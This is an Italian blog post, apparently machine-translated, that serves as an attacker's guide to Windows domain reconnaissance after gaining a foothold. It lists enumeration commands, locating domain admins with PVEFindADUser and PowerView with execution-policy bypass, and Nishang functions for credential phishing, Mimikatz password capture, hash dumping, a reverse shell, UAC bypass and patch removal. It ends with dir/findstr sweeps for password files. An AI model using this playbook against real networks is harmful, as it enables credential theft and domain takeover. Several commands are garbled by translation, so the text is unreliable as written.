Condivisione della tecnologia

Sicurezza intranet: rilevamento delle informazioni all'interno del dominio

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Raccolta di informazioni di base all'interno del dominio

Spiegazione dettagliata dei comandi 2.NET

3. Metodi di raccolta dei domini utilizzati principalmente nelle intranet

4. Come trovare i controller di dominio

5. Interrogare le informazioni di base degli utenti nel dominio

6. Posizionamento della gestione del dominio

7. Comandi Powershell e individuazione delle informazioni sensibili







1. Raccolta di informazioni di base all'interno del dominio:

Quattro situazioni:

1. Utente locale: utente

2. Utente amministratore locale: disabilitato nella versione home, disponibile solo nel server

3. Utenti all'interno del dominio

4. Amministratore del dominio

Gli utenti locali ordinari non possono ottenere informazioni sul dominio

Gli utenti amministratori locali possono trasferire direttamente i propri diritti agli utenti del sistema (utenti all'interno del dominio) e ottenere informazioni all'interno del dominio.

1. Determina se il dominio esiste:

1. Controllare il dominio: ipconfig/all o systeminfo o net config workstation

ipconfig /all: dominio trovato: hack.com

systeminfo: Il dominio trovato è: hack.com

2. Visualizza l'host DNS del dominio: nome di dominio nslookup (hack.com)

3.Tempo netto/dominio tre situazioni

Il dominio esiste, ma l'utente corrente non è un utente del dominio

Esiste un dominio e l'utente corrente è un utente di dominio

L'ambiente di rete corrente è un gruppo di lavoro e non esiste alcun dominio

Dettagli del comando 2.NET:

1.net view: Visualizza l'elenco dei domini, l'elenco dei computer, le risorse condivise del computer specificato: net view (visualizza l'elenco dei computer) net view \computer (visualizza il computer condiviso specificato)

net view /domain:nome dominio (hack) (visualizza l'elenco dei computer)

Utente 2.net per visualizzare gli utenti locali: utente net/dominio per visualizzare quanti utenti sono presenti nel dominio

Aggiungi utente: nome utente net (admin) password (123)/aggiungi

Utilizzo 3.net: collegare il computer o disconnettere il computer dalla risorsa condivisa, visualizzare le informazioni sulla connessione del computer

4.ora di rete: utilizza l'ora per sincronizzare computer o domini: ora di rete \ora di rete del computer /dominio

5.net start: avvia il servizio o visualizza il servizio avviato: net start service

6.net pause: mette in pausa il servizio in esecuzione: servizio net pause

7.net continue: Riattiva il servizio: servizio net continue

8.net stop: Arresta il servizio Windows NT/2000/2003: servizio net stop

9.net share: elimina, crea o visualizza risorse condivise

Sessione 10.net: elenca o disconnette le sessioni del computer locale e dei client ad esso collegati:

net session //computer (identifica il computer da elencare o sottoporre a sessione)

net session //computer delete (disconnette la sessione del computer specificato)

11.net localgroup Visualizza il gruppo di computer (applicabile solo a locale): nome utente net localgroup

Utente del dominio: nome utente/dominio net localgroup

12.net group interroga il nome del gruppo nel dominio (applicabile solo ai controller di dominio): net group /domain

13.net config visualizza i servizi configurabili attualmente in esecuzione oppure visualizza e modifica la configurazione di un servizio (localmente):

net config (visualizza i servizi in esecuzione) net config services (visualizza un elenco di servizi)

Computer 14.net Aggiungere o eliminare computer dal database del dominio:

net computer \computername /add o /del (aggiungi o elimina computer al dominio di accesso)

3. Metodi di raccolta dei domini utilizzati principalmente nelle intranet

Se viene visualizzato "L'elenco dei server di questo gruppo di lavoro non è attualmente disponibile", abilitare i servizi: Server, WorkStation, Browser del computer e chiudere il firewall.

Visualizza dominio: ipconfig/all o systeminfo o net config workstation

Visualizza l'host DNS del dominio: nome di dominio nslookup (hack.com)

Dominio di query: net view/dominio

Interrogare tutti i computer nel dominio: net view /domain:nome dominio

Interroga l'elenco di tutti i gruppi utenti nel dominio: net group /domain

Interrogare l'elenco dei computer di tutti i membri del dominio: gruppo di rete "computer del dominio" /dominio

Interrogare le informazioni sulla password nel dominio: account di rete/dominio

Ottieni informazioni sull'attendibilità del dominio: nltest /domain_trusts

4. Come trovare i controller di dominio

Visualizza il nome del controller di dominio: nltest /DCLIST:hack

Visualizza il nome della macchina, trova l'IP, ping/nslookup: nome del controller di dominio ping/nslookup

A volte il ping è disabilitato. Usa nslookup qui.

Visualizza il nome host del controller di dominio: nslookup ‐type=SRV _ldap._tcp

Controlla l'ora corrente: ora netta/dominio

Visualizza il gruppo di controller di dominio: gruppo di rete "Controller di dominio" /domain

5. Interrogare le informazioni di base degli utenti nel dominio

1. Richiedere informazioni sull'utente nel dominio: net user/domain

2. Visualizza gli utenti locali: l'account utente wmic ottiene il nome Utenti del dominio: l'account utente wmic ottiene il dominio, il nome

Utente locale:

Utente del dominio:

3. Controllare gli utenti esistenti: utente dsquery (a volte potrebbe non essere eseguito e può essere eseguito solo sulla macchina server)

4. Interrogare il gruppo utenti dell'amministratore locale: amministratori net localgroup

5. Interrogare gli utenti dell'amministratore di dominio: gruppo di rete "domain admins" /domain

6. Interrogare il gruppo utenti dell'amministratore del dominio: gruppo di rete "Enterprise Admins" /domain

6. Posizionamento della gestione del dominio

Qui sono necessari due strumenti

Prima carica lo strumento sul server e poi eseguilo

1.PVEFindADUser: PVEFindADUser.exe -current (notare il percorso) Questo strumento può verificare quali utenti hanno effettuato l'accesso al computer, permettendoci di trovare l'amministratore del dominio

2.script powerView:

powershell.exe ‐exec bypass ‐comando "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7. Comandi Powershell e individuazione delle informazioni sensibili

Controlla prima le autorizzazioni: Get-ExecutionPolicy

Modifica la policy in esecuzione: Set-ExecutionPolicy Unrestricted (solo le autorizzazioni Unrestricted possono eseguire pow)

strumento Nishang (c'è un collegamento per il download nell'articolo precedente):

Dopo averlo inserito nella directory CS, importalo direttamente: powershell-import nishang/nishang.psm1

Esegui: comando PowerShell

Alcuni comandi comunemente usati:

Check-VM: controlla se l'host è una macchina virtuale

Invoke-CredentialsPhish: induce con l'inganno l'utente a inserire la propria password

Get-WLAN-Keys: informazioni Wi-Fi

Invoke-Mimikatz: cattura le password

Get-PassHash: ottieni l'hash

Get-PassHints: ottieni informazioni sul suggerimento per la password dell'utente

Invoke-PowerShellTcp: shell di rimbalzo

Invoke-PsUACme: ignora l'UAC

Rimuovi-Aggiornamento: rimuove la patch

Get-Information: informazioni locali

Esempio: PowerShell Check-VM

Individuazione dei dati sensibili:

1. Raccogliere vari file sensibili nelle directory designate

cartella /a /s /bd:"*.txt"

cartella /a /s /b C:"*.xlsx"

cartella /a /s /bd:"*.md"

directory /a /s /bd:"*.sql"

cartella /a /s /bd:"*.pdf"

cartella /a /s /bd:"*.docx"

cartella /a /s /bd:"*.doc"

dir /a /s /bd:"*conf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*password*"

dir /a /s /bd:"*passa*"

dir /a /s /bd:"*accesso*"

dir /a /s /bd:"*utente*"

2. Raccogli varie password di account dai file nella directory specificata

findstr /si passa *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si password utente *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si utente *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

Esempio: dir /a /s /bd:"*.txt"